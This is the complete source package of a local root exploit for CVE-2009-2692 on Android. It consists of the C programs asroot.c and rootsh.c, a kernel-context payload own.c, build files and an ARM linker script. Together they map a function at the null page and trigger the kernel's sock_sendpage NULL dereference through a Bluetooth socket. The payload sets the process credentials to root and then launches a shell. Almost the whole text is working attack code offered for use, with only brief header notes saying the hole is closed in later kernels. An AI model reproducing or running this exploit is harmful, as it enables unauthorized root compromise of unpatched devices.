|
1*
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
back: http://milw0rm.com/sploits/android-root-20090816.tar.gz
*/
-------------------------------------asroot.c--------------------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <fcntl.h>
extern int got_root;
extern int (*root_sendpage)();
static int do_get_root(char *template)
{
int fdin, fdout;
fdin = mkstemp(template);
if (fdin < 0) return -1;
if (unlink(template) < 0) return -1;
if (ftruncate(fdin, PAGE_SIZE) < 0) return -1;
fdout = socket(PF_BLUETOOTH, SOCK_DGRAM, 0);
if (fdout < 0) return -1;
sendfile(fdout, fdin, NULL, PAGE_SIZE);
close(fdout);
close(fdin);
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "ERROR: Bad arguments\n");
return -1;
}
if (do_get_root(argv[1]) < 0) {
fprintf(stderr, "FAILURE: Unable to setup.\n");
return -1;
}
if (got_root == 1) {
fprintf(stderr, "SUCCESS: Got root!\n");
} else {
fprintf(stderr, "FAILURE: Didn't get root.\n");
return -1;
}
execv(argv[2], &argv[2]);
return -1;
}
----------------------------------------------Android.mk---------------------------------------------
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_FORCE_STATIC_EXECUTABLE := true
LOCAL_MODULE := rootsh
LOCAL_SRC_FILES := rootsh.c
LOCAL_PREBUILT_OBJ_FILES := own.o
LOCAL_STATIC_LIBRARIES := libc
LOCAL_MODULE_PATH := $(LOCAL_PATH)
# big hack.
TARGET_GLOBAL_LD_DIRS := $(TARGET_GLOBAL_LD_DIRS) -Wl,-T,$(LOCAL_PATH)/armelf.x,--no-gc-sections
$(LOCAL_PATH)/own.o: $(LOCAL_PATH)/own.c
PATH=$(CURDIR)/prebuilt/$(HOST_PREBUILT_TAG)/toolchain/arm-eabi-4.2.1/bin:$(PATH) make -C $(CURDIR)/kernel ARCH=arm KBUILD_VERBOSE=$(SHOW_COMMANDS) CROSS_COMPILE=arm-eabi- M=$(LOCAL_PATH) modules
include $(BUILD_EXECUTABLE)
#################################################
include $(CLEAR_VARS)
LOCAL_FORCE_STATIC_EXECUTABLE := true
LOCAL_MODULE := asroot
LOCAL_SRC_FILES := asroot.c
LOCAL_PREBUILT_OBJ_FILES := own.o
LOCAL_STATIC_LIBRARIES := libc
LOCAL_MODULE_PATH := $(LOCAL_PATH)
# big hack.
TARGET_GLOBAL_LD_DIRS := $(TARGET_GLOBAL_LD_DIRS) -Wl,-T,$(LOCAL_PATH)/armelf.x,--no-gc-sections
$(LOCAL_PATH)/own.o: $(LOCAL_PATH)/own.c
PATH=$(CURDIR)/prebuilt/$(HOST_PREBUILT_TAG)/toolchain/arm-eabi-4.2.1/bin:$(PATH) make -C $(CURDIR)/kernel ARCH=arm KBUILD_VERBOSE=$(SHOW_COMMANDS) CROSS_COMPILE=arm-eabi- M=$(LOCAL_PATH) modules
include $(BUILD_EXECUTABLE)
----------------------------------------------------rootsh.c--------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <fcntl.h>
extern int got_root;
extern int (*root_sendpage)();
static void do_get_root(void)
{
int fdin, fdout;
char template[] = "/sdcard/droidsploidXXXXXX";
printf("ROOTING\n");
fdin = mkstemp(template);
unlink(template);
ftruncate(fdin, PAGE_SIZE);
fdout = socket(PF_BLUETOOTH, SOCK_DGRAM, 0);
sendfile(fdout, fdin, NULL, PAGE_SIZE);
return;
}
int main(void)
{
do_get_root();
if (got_root == 1) {
printf("Got root!\n");
} else {
printf("Didn't get root.\n");
return -1;
}
execl("/system/bin/sh", "/system/bin/sh", "-", NULL);
return -1;
}
-----------------------------------------------Makefile---------------------------------------
ifdef TOPDIR
obj-m += own.o
else
default:
$(MAKE) -C $(KERNEL_DIR) ARCH=arm CROSS_COMPILE=$(CROSS_COMPILE) KBUILD_VERBOSE=1 M=$(PWD) modules
distclean:
rm -f *.ko *.o .*.cmd *.mod.c Module.symvers modules.order
endif
-------------------------------------------own.c---------------------------------------------
#include <linux/module.h>
#include <linux/security.h>
int got_root = 0;
int __attribute__((section(".null"))) root_sendpage(void *sk, void *page, int offset, size_t size, int flags)
{
current->uid = current->euid = 0;
current->gid = current->egid = 0;
got_root = 1;
return -ECONNREFUSED;
}
-------------------------------------------armelf.x------------------------------------------------
/* Default linker script, for normal executables */
OUTPUT_FORMAT("elf32-littlearm", "elf32-bigarm",
"elf32-littlearm")
OUTPUT_ARCH(arm)
ENTRY(_start)
SEARCH_DIR("/usr/local/armdev/arm-elf/lib");
/* Do we need any of these for elf?
__DYNAMIC = 0; */
MEMORY {
allspace (rwx) : org = 0x8000, len = 32M
nullspace (rwx) : org = 0, len = 0x1000
}
SECTIONS
{
/* Read-only sections, merged into text segment: */
/* PROVIDE (__executable_start = 0x8000); . = 0x8000; */
. = 0x8000 + SIZEOF_HEADERS;
.interp : { *(.interp) }
.hash : { *(.hash) }
.dynsym : { *(.dynsym) }
.dynstr : { *(.dynstr) }
.gnu.version : { *(.gnu.version) }
.gnu.version_d : { *(.gnu.version_d) }
.gnu.version_r : { *(.gnu.version_r) }
.rel.init : { *(.rel.init) }
.rela.init : { *(.rela.init) }
.rel.text : { *(.rel.text .rel.text.* .rel.gnu.linkonce.t.*) }
.rela.text : { *(.rela.text .rela.text.* .rela.gnu.linkonce.t.*) }
.rel.fini : { *(.rel.fini) }
.rela.fini : { *(.rela.fini) }
.rel.rodata : { *(.rel.rodata .rel.rodata.* .rel.gnu.linkonce.r.*) }
.rela.rodata : { *(.rela.rodata .rela.rodata.* .rela.gnu.linkonce.r.*) }
.rel.data.rel.ro : { *(.rel.data.rel.ro*) }
.rela.data.rel.ro : { *(.rel.data.rel.ro*) }
.rel.data : { *(.rel.data .rel.data.* .rel.gnu.linkonce.d.*) }
.rela.data : { *(.rela.data .rela.data.* .rela.gnu.linkonce.d.*) }
.rel.tdata : { *(.rel.tdata .rel.tdata.* .rel.gnu.linkonce.td.*) }
.rela.tdata : { *(.rela.tdata .rela.tdata.* .rela.gnu.linkonce.td.*) }
.rel.tbss : { *(.rel.tbss .rel.tbss.* .rel.gnu.linkonce.tb.*) }
.rela.tbss : { *(.rela.tbss .rela.tbss.* .rela.gnu.linkonce.tb.*) }
.rel.ctors : { *(.rel.ctors) }
.rela.ctors : { *(.rela.ctors) }
.rel.dtors : { *(.rel.dtors) }
.rela.dtors : { *(.rela.dtors) }
.rel.got : { *(.rel.got) }
.rela.got : { *(.rela.got) }
.rel.bss : { *(.rel.bss .rel.bss.* .rel.gnu.linkonce.b.*) }
.rela.bss : { *(.rela.bss .rela.bss.* .rela.gnu.linkonce.b.*) }
.rel.plt : { *(.rel.plt) }
.rela.plt : { *(.rela.plt) }
.init :
{
KEEP (*(.init))
} =0
.plt : { *(.plt) }
.null :
{
*(.null)
} >nullspace
.text :
{
*(.text .stub .text.* .gnu.linkonce.t.*)
KEEP (*(.text.*personality*))
/* .gnu.warning sections are handled specially by elf32.em. */
*(.gnu.warning)
*(.glue_7t) *(.glue_7)
} =0
.fini :
{
KEEP (*(.fini))
} =0
PROVIDE (__etext = .);
PROVIDE (_etext = .);
PROVIDE (etext = .);
.rodata : { *(.rodata .rodata.* .gnu.linkonce.r.*) }
.rodata1 : { *(.rodata1) }
/* We have to wrap extab and exidx sections with KEEP because we use
--gc-sections. */
.ARM.extab : { KEEP (*(.ARM.extab* .gnu.linkonce.armextab.*)) }
__exidx_start = .;
.ARM.exidx : { KEEP (*(.ARM.exidx* .gnu.linkonce.armexidx.*)) }
__exidx_end = .;
.eh_frame_hdr : { *(.eh_frame_hdr) }
.eh_frame : ONLY_IF_RO { KEEP (*(.eh_frame)) }
.gcc_except_table : ONLY_IF_RO { KEEP (*(.gcc_except_table)) *(.gcc_except_table.*) }
/* Adjust the address for the data segment. We want to align at exactly
a page boundary to make life easier for apriori. */
. = ALIGN(4096);
/* Exception handling */
.eh_frame : ONLY_IF_RW { KEEP (*(.eh_frame)) }
.gcc_except_table : ONLY_IF_RW { KEEP (*(.gcc_except_table)) *(.gcc_except_table.*) }
/* Thread Local Storage sections */
.tdata : { *(.tdata .tdata.* .gnu.linkonce.td.*) }
.tbss : { *(.tbss .tbss.* .gnu.linkonce.tb.*) *(.tcommon) }
/* Ensure the __preinit_array_start label is properly aligned. We
could instead move the label definition inside the section, but
the linker would then create the section even if it turns out to
be empty, which isn't pretty. */
. = ALIGN(32 / 8);
PROVIDE (__preinit_array_start = .);
.preinit_array : { KEEP (*(.preinit_array)) }
PROVIDE (__preinit_array_end = .);
PROVIDE (__init_array_start = .);
.init_array : { KEEP (*(.init_array)) }
PROVIDE (__init_array_end = .);
PROVIDE (__fini_array_start = .);
.fini_array : { KEEP (*(.fini_array)) }
PROVIDE (__fini_array_end = .);
.ctors :
{
/* gcc uses crtbegin.o to find the start of
the constructors, so we make sure it is
first. Because this is a wildcard, it
doesn't matter if the user does not
actually link against crtbegin.o; the
linker won't look for a file to match a
wildcard. The wildcard also means that it
doesn't matter which directory crtbegin.o
is in. */
KEEP (*crtbegin*.o(.ctors))
/* We don't want to include the .ctor section from
from the crtend.o file until after the sorted ctors.
The .ctor section from the crtend file contains the
end of ctors marker and it must be last */
KEEP (*(EXCLUDE_FILE (*crtend*.o ) .ctors))
KEEP (*(SORT(.ctors.*)))
KEEP (*(.ctors))
}
.dtors :
{
KEEP (*crtbegin*.o(.dtors))
KEEP (*(EXCLUDE_FILE (*crtend*.o ) .dtors))
KEEP (*(SORT(.dtors.*)))
KEEP (*(.dtors))
}
.jcr : { KEEP (*(.jcr)) }
.data.rel.ro : { *(.data.rel.ro.local) *(.data.rel.ro*) }
.dynamic : { *(.dynamic) }
.got : { *(.got.plt) *(.got) }
.data :
{
__data_start = . ;
*(.data .data.* .gnu.linkonce.d.*)
KEEP (*(.gnu.linkonce.d.*personality*))
SORT(CONSTRUCTORS)
}
.data1 : { *(.data1) }
_edata = .;
PROVIDE (edata = .);
__bss_start = .;
__bss_start__ = .;
.bss :
{
*(.dynbss)
*(.bss .bss.* .gnu.linkonce.b.*)
*(COMMON)
/* Align here to ensure that the .bss section occupies space up to
_end. Align after .bss to ensure correct alignment even if the
.bss section disappears because there are no input sections. */
. = ALIGN(32 / 8);
}
. = ALIGN(32 / 8);
_end = .;
_bss_end__ = . ; __bss_end__ = . ; __end__ = . ;
PROVIDE (end = .);
/* Stabs debugging sections. */
.stab 0 : { *(.stab) }
.stabstr 0 : { *(.stabstr) }
.stab.excl 0 : { *(.stab.excl) }
.stab.exclstr 0 : { *(.stab.exclstr) }
.stab.index 0 : { *(.stab.index) }
.stab.indexstr 0 : { *(.stab.indexstr) }
.comment 0 : { *(.comment) }
/* DWARF debug sections.
Symbols in the DWARF debugging sections are relative to the beginning
of the section so we begin them at 0. */
/* DWARF 1 */
.debug 0 : { *(.debug) }
.line 0 : { *(.line) }
/* GNU DWARF 1 extensions */
.debug_srcinfo 0 : { *(.debug_srcinfo) }
.debug_sfnames 0 : { *(.debug_sfnames) }
/* DWARF 1.1 and DWARF 2 */
.debug_aranges 0 : { *(.debug_aranges) }
.debug_pubnames 0 : { *(.debug_pubnames) }
/* DWARF 2 */
.debug_info 0 : { *(.debug_info .gnu.linkonce.wi.*) }
.debug_abbrev 0 : { *(.debug_abbrev) }
.debug_line 0 : { *(.debug_line) }
.debug_frame 0 : { *(.debug_frame) }
.debug_str 0 : { *(.debug_str) }
.debug_loc 0 : { *(.debug_loc) }
.debug_macinfo 0 : { *(.debug_macinfo) }
/* SGI/MIPS DWARF 2 extensions */
.debug_weaknames 0 : { *(.debug_weaknames) }
.debug_funcnames 0 : { *(.debug_funcnames) }
.debug_typenames 0 : { *(.debug_typenames) }
.debug_varnames 0 : { *(.debug_varnames) }
/* Adding the word ABSOLUTE below, so that the _stack below won't float
into a random section. If _stack is not absolutely with .stack section,
we saw that sometimes _stack got inserted into the .debug_frame section
because it's processed by the linker at that moment. As a result, _stack
symbol will get wrongly moved and gelf_update_symshndx() will return
invalid data. */
.stack 0x80000 :
{
_stack = ABSOLUTE(.);
*(.stack)
}
.note.gnu.arm.ident 0 : { KEEP (*(.note.gnu.arm.ident)) }
/DISCARD/ : { *(.note.GNU-stack) }
}
|
推荐
评论(0条)
